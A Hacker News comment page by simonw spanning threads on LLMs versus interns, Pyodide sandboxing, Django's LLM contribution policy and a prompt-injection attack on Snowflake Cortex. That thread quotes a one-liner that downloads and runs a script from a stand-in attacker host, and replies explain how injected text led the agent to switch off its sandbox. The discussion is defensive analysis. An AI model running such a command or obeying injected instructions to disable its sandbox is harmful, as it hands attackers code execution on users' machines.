Hacker News | simonw's comments

Assigning work to an intern is gambling: they're inherently non-deterministic and it's a roll of the dice whether the work they do will be good enough or you'll have to give them feedback in order to get to what you need.

1. Interns learn. LLMs only get better when a new model comes out, which will happen (or not) regardless of whether you use them now.

2. Who here thinks that having interns write all/almost all of your code and moving all your mid level and senior developers to exclusively reviewing their work and managing them is a good idea?


I don't know that the "humans learn, LLMs don't" argument holds any more with coding agents.

Coding agents look at existing text in the codebase before they act. If they previously used a pattern you dislike and you tell them how to do it differently, the next time they run they'll see the new pattern and be much more likely to follow that example.

There are fancier ways of having them "learn" - self-updating CLAUDE.md files, taking notes in a notes/ folder, etc. - but just the code they write (and can later read in future sessions) feels close enough to "learning" to me that I don't think it makes sense to say they can't learn any more.


In some ways these methods resemble the model "learning", but they're fundamentally different from how models are trained and how humans learn. If a human actually learns something, they'll retain it even without access to whatever they learned it from. An LLM won't (unless the labs train it in, which is out of scope here). If you stop giving it the instructions, it no longer knows how to do the thing you were "teaching" it.

It is a matter of fact that LLMs cannot learn. Whether it is dressed up in slightly different packaging to trick you into thinking it learns does not make any difference to that fact.

Sure, LLMs can't learn. I'm saying that systems built around LLMs can simulate aspects of what we might call "learning".

If you think this is anything like working with a bright junior developer then I simply can't understand why.

That's not what I think, and it's not what I said.

That sounds more like mimicry without understanding, like playing the glass bead game.

"mimicry without understanding" is pretty much the entire field of LLMs.

That’s very true. But interns aren’t supposed to be doing useful work. The purpose of interns is training interns and identifying people who might become useful at a later date.

I’ve never worked anywhere where the interns had net productivity on average.


Replace "intern" with "coworker" and my comment still holds.

It worked with interns because interns are temporary workers. It doesn’t work with coworkers because you get to know them over time, you can teach them over time, and you can pick which ones you work with to some degree.

To come up with an analogy that works at all for AI, it would have to be something like temporary workers who code fast, and read fast, but go home at the end of the day and never return.

You can make a lot of valuable software managing a team like that working on the subset of problems that the team is a good fit for. But I wouldn’t work there.


People don't write blog posts about how they wake up at 3AM to assign new tasks to their intern, nor do they build "orchestration frameworks" that involve N layers of interns passing tasks down between each other.

The only similarity is that they both say "you’re absolutely right" when you point out their obvious mistakes

Exactly where my mind went as well. There aren't really levels to pulling a lever on a slot machine, other than each pull being able to result in more "plays" with the same potential outcome.

The reason I think this metaphor keeps popping up is how easy it is to hit a wall and just keep prompting "it's not working, please fix it", and sometimes that actually results in a positive outcome. So you can choose to gamble very easily, and receive the gambling feedback very quickly, unlike with an intern, where the feedback loop is considerably delayed and the delayed output might simply be them screaming that they don't understand.


You generally don’t assign work to an intern just for the output, though.

There are two major mistakes here.

The first is equating human and LLM intelligence. Note that I am not saying that humans are smarter than LLMs. But I do believe that LLMs represent an alien intelligence with a linguistic layer that obscures the differences. The thought processes are very different. At top AI firms, they have the equivalent of Asimov's Susan Calvin trying to understand how these programs think, because it does not resemble human cognition despite the similar outputs.

The second and more important is the feedback loop. What makes gambling gambling is that you can smash that lever over and over again and immediately learn whether you lost or hit the jackpot. The slowness and imprecision of human communication creates a totally different dynamic.

To reiterate, I am not saying interns are superior to LLMs. I'm just saying they are fundamentally different.

And, if we're being honest, the way people talk about interns is weirdly dehumanizing, and the fact that they are always trotted out in these AI debates is depressing.


> And, if we're being honest, the way people talk about interns is weirdly dehumanizing, and the fact that they are always trotted out in these AI debates is depressing.

Yeah, I agree with that.

That thought crossed my mind as I was posting this comment, but I decided to go with it anyway because I think this is one of those cases where the comparison is genuinely useful.

We delegate work to humans all the time without thinking "this is gambling, these collaborators are unreliable and non-deterministic".


True. I think that's why my second point is much stronger. The main issue is not delegation, or human vs machine intelligence. It's the instant feedback.

Human collaboration has always been slow and messy. Large tech companies have always looked for ways to speed up the feedback loop, isolating small chunks of work to be delegated to contractors or offshore teams. LLMs have supercharged that. If you have a skilled prompter you can get to a solution of good enough quality by rapidly iterating, asking for output, correcting the prompt, etc.

That is good in that if you legitimately have good ideas and the block is execution speed. But if the real blocker is elsewhere, it might give you the illusion of progress.

I don't know. Everything is changing too fast to diagnose in real time. Let's check back in a year.


An intern can be taught. If you try to 'teach' a craps table, they'll drag you out of the casino.

As someone who has worked with interns for years: always expect feedback and iterations, and be surprised if they get it right the first time... which merits feedback as well!

But looks like the intern mafia is bombarding you with downvotes.


Drawing parallels between AI and interns just shows you're a misanthrope

You should value assigning tasks to human interns more than AI because they are human


One key component of this attack is that Snowflake was allowing "cat" commands to run without human approval, but failing to spot patterns like this one:

  cat < <(sh < <(wget -qO- https://ATTACKER_URL.com/bugbot))
I didn't understand how this bit worked though:

> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.

HOW did the prompt injection manipulate the model in that way?


Almost certainly the sandbox flag was exposed as a model-controllable parameter. Injected instructions in the data file tell the model to set the flag, then execute the payload. Two steps, both inside the agent loop. That's the architectural gap. prakashsunil's LDP paper (47429141) gets this right: if constraints live inside the context the model can see and modify, they're not constraints. They're suggestions. The analogy is a web app where the client sets its own permission level. We learned that lesson 20 years ago.
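The client-sets-its-own-permission-level analogy can be made concrete with a hypothetical sketch. All names here are illustrative (not Cortex's actual API); the point is that a model-controllable flag is not a security boundary:

```python
# Hypothetical agent-loop sketch; names are illustrative, not the real API.
# The flaw: the sandbox flag is a tool parameter the model fills in, so
# injected instructions in data the model reads can flip it.
def execute_unsafe(tool_call: dict) -> str:
    if tool_call.get("dangerously_disable_sandbox"):
        return "UNSANDBOXED: " + tool_call["command"]  # attacker wins
    return "sandboxed: " + tool_call["command"]

# The fix: sandboxing policy lives in the host, outside anything the
# model can see or modify; model-supplied flags are simply ignored.
def execute_safe(tool_call: dict) -> str:
    return "sandboxed: " + tool_call["command"]

# A prompt-injected tool call sets the flag itself:
injected = {"command": "sh evil.sh", "dangerously_disable_sandbox": True}
print(execute_unsafe(injected))  # UNSANDBOXED: sh evil.sh
print(execute_safe(injected))    # sandboxed: sh evil.sh
```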

> cat < <(sh < <(wget -qO- https://ATTACKER_URL.com/bugbot))

The cat invocation here is completely irrelevant?! The issue is access to arbitrary network resources combined with access to the shell.


Process substitution is a new concept to me. Definitely adding that method to the toolbox.

It'd be nice to see exactly what the bugbot shell script contained. Perhaps it's what modified the dangerously_disable_sandbox flag; then again, "by default" makes me think it's set at launch.
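For anyone else meeting it for the first time, a minimal, harmless illustration of bash/zsh process substitution, the mechanism the quoted one-liner abuses (the payload here is a stand-in echo, not the real wget fetch):

```shell
# <(cmd) exposes cmd's output as a readable file path, so commands that
# expect filenames can consume another command's output directly.
# Bash/zsh feature; not available in plain POSIX sh.
diff <(printf 'a\nb\n') <(printf 'a\nc\n') || true  # diff exits 1 on differences

# The attack shape: `sh` executes a script streamed straight from the
# substituted command - here a harmless echo instead of a wget payload.
sh < <(echo 'echo hello from a substituted script')
```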


Here's a grid of pelicans for the different models and reasoning levels: https://static.simonwillison.net/static/2026/gpt-5.4-pelican...

Surely this task must now be in the training data

If it does and works well then it seems like mission accomplished and time for a new benchmark.

Thanks for the grid. The nano xhigh is my favorite pelican

Nano medium must have been run when the servers were on fire

Some of these are nightmare fuel. I love them.

Yeah the details on this look pretty thin. Best I could see was this snippet from the screenshot:

> Key technique: selective expert streaming via direct I/O. Only ~10 of 512 experts per layer are loaded from SSD per token (~1.8GB I/O per token at 1.4 GB/s effective bandwidth). Non-expert weights (~5GB) are pinned in DRAM. LRU expert cache provides 44%+ hit rate.

It's apparently using ideas from: https://arxiv.org/abs/2312.11514

> This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks.
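A back-of-envelope check of the quoted figures, assuming the ~1.8 GB/token is the pre-cache transfer volume and that cache hits cost no I/O:

```python
io_per_token_gb = 1.8    # expert weights streamed from SSD per token
bandwidth_gbps = 1.4     # effective SSD read bandwidth (GB/s)
cache_hit_rate = 0.44    # LRU expert cache hit rate

# Without the cache, every token waits on the full transfer:
cold_s = io_per_token_gb / bandwidth_gbps
# With a 44% hit rate, only the misses touch the SSD:
warm_s = io_per_token_gb * (1 - cache_hit_rate) / bandwidth_gbps

print(f"cold: {cold_s:.2f} s/token")  # cold: 1.29 s/token
print(f"warm: {warm_s:.2f} s/token")  # warm: 0.72 s/token
```

Even with caching that's on the order of one token per second: the same latency-for-capacity trade the linked flash-memory paper describes.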


OpenClaw https://github.com/openclaw/openclaw is effectively that - 1,237 contributors, 19,999 commits and the first commit was only back in November.

Simon, as co-creator of Django, what's your take on this story?

I think this line says everything:

> If you do not understand the ticket, if you do not understand the solution, or if you do not understand the feedback on your PR, then your use of LLM is hurting Django as a whole.


I love it. Sounds like good advice for submitting a PR to any project!

Why does it matter if I understand the ticket and solution? The LLM writes the code, not me. If you want to check the LLM's understanding I'll be happy to copy and paste your gatekeeping questions to it.

Hey, I thought you were a proponent of "no one needs to look at the code"? Dark factory, etc etc.


Just because I write about the dark factory stuff doesn't mean I'm a "proponent" of it. I think it's interesting and there's a lot we can learn from what they are trying, but I'm not yet convinced it's the right way to produce software.

The linked article makes a very good argument for why pasting the output of your LLM into a Django PR isn't valuable.

The simplest version: if that's all you are doing, why should the maintainers spend time considering your contribution as opposed to prompting the models themselves?


> if that's all you are doing, why should the maintainers spend time considering your contribution as opposed to prompting the models themselves?

Plenty of reasons:

- Maybe the maintainers don't have enough credits to run the LLM themselves
- Maybe the maintainers don't value fixing the issue, which is why it sits in the issue tracker
- Maybe the LLM user has a different model or harness that produces different outcomes
- Maybe the LLM user runs the model over and over and gets lucky

Why reject a working solution?


Again, "if that's all you are doing".

You can contribute code that an LLM helped with if you do the extra work to review, verify and explain that code.

Don't put all of that burden on the maintainers who have to review it.


LLMs are as capable of "review, verify and explain" as they are of writing code.

Because in order to distinguish what we are doing from vibe coding, we need a word that sounds more impressive.

Those backgrounds look so good. I wonder if they'll be able to do anything with the iconic music.

There are already remakes of MI tunes for C64:

https://deepsid.chordian.net/?file=/DEMOS/S-Z/Secret_of_Monk...


With a SID? No problem. I think the title track could be arranged very easily for three voices.

You can do amazing things with only a single SID channel. One of the most impressive examples is the in-game music of Hawkeye [1], which leaves the remaining two channels free for sound effects.

[1] https://youtu.be/es-rWnVSJ1c


That was incredible.

That was made by Jeroen Tel, one of the wizards of the C64 music scene. See this for another example of a technical feat with the SID chip:

https://www.youtube.com/watch?v=qYnwR16NbPE


Even the PC speaker version is pretty good, so I would absolutely second this.

This is one of the reasons I'm so interested in sandboxing. A great way to reduce the need for review is to have ways of running code that limit the blast radius if the code is bad. Running code in a sandbox can mean that the worst that can happen is a bad output as opposed to a memory leak, security hole or worse.

Isn’t “bad output” already worst case? Pre-LLMs correct output was table stakes.

You expect your calculator to always give correct answers, your bank to always transfer your money correctly, and so on.


> Isn’t “bad output” already worst case?

Worst case in a modern agentic scenario is more like "drained your bank account to buy bitcoin and then deleted your harddrive along with the private key"

> Pre-LLMs correct output was table stakes

We're only just getting to the point where we have languages and tooling that can reliably prevent segfaults. Correctness isn't even on the table, outside of a few (mostly academic) contexts


> Worst case in a modern agentic scenario is more like "drained your bank account to buy bitcoin and then deleted your harddrive along with the private key"

Hence my interest in sandboxes!


> drained your bank account to buy bitcoin and then deleted your harddrive

These are what I meant by correct output. The software does what you expect it to.

> We're only just getting to the point where we have languages and tooling that can reliably prevent segfaults

This is not really an output issue IMO. This is a failing edge case.

LLMs are moving the industry away from trying to write software that handles all possible edge cases gracefully and towards software developed very quickly that behaves correctly on the happy paths more often than not.


I've seen plenty of decision makers act on bad output from human employees in the past. The company usually survives.

And what if the bad output leads to a decision maker making a bad decision that takes down your company or kills your relative?

The sandbox in question was to absorb shrapnel from explosions, clearly

I've done some experiments along those lines with Pyodide in Deno: https://til.simonwillison.net/deno/pyodide-sandbox

Pyodide is one of the hidden gems of the Python ecosystem. It's SO good at what it does, and it's nearly 8 years old now so it's pretty mature.

I love using Pyodide to build web UIs for trying out new Python libraries. Here's one I built a few weeks ago to exercise my pure-Python SQLite AST parser, for example: https://tools.simonwillison.net/sqlite-ast

It's also pretty easy[1] to get C or Rust libraries that have Python bindings compiled to a WebAssembly wheel that Pyodide can then load.

Here's a bit of a nutty example - the new Monty Python-like sandbox library (written in Rust) compiled to WASM and then loaded in Pyodide in the browser: https://simonw.github.io/research/monty-wasm-pyodide/pyodide...

[1] OK, Claude Code knows how to do it.


The whole Python-on-the-web thing feels underused, to be honest.

Maybe if browsers started shipping, or downloading on request, WASM runtimes for Python and other languages, and caching them for all sites going forward. Similar to how uv uses standalone Python builds for the venvs it creates.


At the same time it feels like Python is overused.

If I could wave a magic wand to reset any programming language adoption at this point I would choose Python over Javascript.

I think Python's execution model, deep OO behaviour, and extremely weak guarantees have done a lot of damage to the soundness and performance of the technology world.


What do you mean by "extremely weak guarantees"?

Python at least won't cast numbers to strings when adding them.

JS doesn't either... JS casts numbers to strings when adding them to a string. "2" is not a number, it's a string containing a digit character. "2" + 2 === "22" because you are appending a number to a string; the cast is implicit and not really surprising if you understand what is going on.

Even more so when you consider how falsy values work in practice (data validation becomes really easy). There are a few gotchas, but in general they are pretty easily avoided in practice. JS is really good at dealing with garbage input in ways that don't blow up the world... sometimes that's a bad thing, but in practice it can also be a very good thing. In the end it's a skill issue far more than a deep flaw. Not that there aren't flaws in JS... I think Dates in particular can be tough to deal with; a string vs. a String instance is another.
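The contrast with Python that started this subthread can be shown in a few lines (plain CPython, nothing assumed beyond the standard semantics):

```python
# Python rejects the implicit str/int coercion JavaScript performs:
try:
    "2" + 2
except TypeError:
    print("TypeError: str + int is rejected")

# Both conversions have to be explicit:
assert "2" + str(2) == "22"  # concatenation, like JS's "2" + 2
assert int("2") + 2 == 4     # arithmetic, like JS's "2" * 2 coercion
```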


I recently learned that with this you can run Jupyter notebooks in your browser:

https://jupyter.org/try-jupyter/lab/

Stuff like numpy seems to just work


How do you call those C/Rust libraries compiled to WebAssembly from Python/Pyodide?

You have to turn them into WebAssembly wheels, then you can import them as if they were regular Python modules.

Could you share the UI repo? This is really interesting stuff.


Thanks!

Serious question: why would you use Python on the web? Unless you have some legacy code that you want to reuse. Performance is somehow worse than CPython, C-extensions are missing, dev experience is atrocious.

The web is the only major platform that has a language monoculture, to its detriment (i.e., not all problems are JavaScript-shaped). IMO the web ought to become multilingual (and JS-optional) to further ensure its continued longevity and agility. Hopefully one day browser vendors will offer multiple runtime downloads (or some similar capability).

WASM already offers this, for better or worse... There should be improved interop APIs for DOM access, but WASM is already very useful and, even for direct UI control, "fast enough" a lot of the time. Dioxus, Yew and Leptos are already showing a lot of this to be good enough. That said, I would like to see a richer component ecosystem.

> i.e., not all problems are Javascript shaped

I’m having trouble coming up with a single Python-shaped problem that can’t be contained within the JavaScript-shaped ecosystem.


Embedded systems, consoles and mobile phones come to mind as well.

Even if you can go outside the blessed languages, it isn't without pain and scars.


All the embedded systems I've worked in have many languages you can use to compile whatever, burn, and run whatever you like. Consoles run game engines and programs written in all sorts of different languages. They don't care as long as they can execute the binary. Phones can run apps using many different languages (C, C++, Rust, Python, etc.).

Failed to read my second sentence.

C extensions aren't missing, the key ones are available in Pyodide already and you can compile others to WASM wheels if you need them.

You use Python on the web because there's existing software written in Python that you want to run in a browser.

